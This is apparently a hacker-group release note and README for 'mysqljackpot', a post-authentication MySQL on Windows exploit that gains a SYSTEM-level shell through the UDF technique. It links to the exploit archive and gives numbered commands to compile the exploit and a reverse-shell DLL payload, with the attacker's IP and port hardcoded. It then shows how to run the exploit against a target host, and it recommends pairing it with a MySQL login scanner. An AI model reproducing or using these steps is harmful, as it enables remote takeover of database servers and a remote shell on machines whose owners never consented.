*** | |
FARLiGHT ELiTE HACKERS LEGACY R3L3ASE | |
*** | |
Attached is the MySQL Windows Remote Exploit (post-auth, udf | |
technique) including the previously released mass scanner. | |
The exploit is mirrored at the farlight website http://www.farlight.org. | |
Oracle MySQL on Windows Remote SYSTEM Level Exploit zeroday | |
All owned By Kingcope | |
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23073.tar.gz | |
Installation Instructions | |
============================= | |
1. Install mysql client libraries and headers (UNIX) | |
RedHat based (e.g. CentOS): | |
yum install mysql mysql-devel | |
2. Compile the standalone exploit | |
issue commands: | |
gcc mysqljackpot.c -o mysqljackpot -L/usr/lib/mysql -lmysqlclient | |
3. Compile the reverse shell payload (this is required!) | |
required because the connect back ip and port are hardcoded in the dll: | |
use mingw on windows or wine | |
change REVERSEIP and REVERSEPORT to suit your needs. If you change REVERSEPORT you have | |
to change the port in mysqljackpot.c too (default port: 443). | |
issue commands: | |
set PATH=%PATH%;c:\MinGW\bin\ | |
gcc -c payload.c | |
gcc -shared -o payload.dll payload.o -lws2_32 | |
copy the payload.dll into the mysqljackpot exploit folder | |
4. Run The Exploit | |
./mysqljackpot -u root -p "" -t 99.99.99.99 | |
A valid database admin user and his password are required | |
for the exploit to work properly. | |
This exploit is especially useful when used in connection | |
to a MySQL login scanner, see scanner/README.mysql inside this package. | |
Be sure to have the firewall open on the desired reverse port | |
on the attacking machine. | |
5. Enjoy your SYSTEM Shell!!! | |
Yours Sincerely, | |
-- Kingcope | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment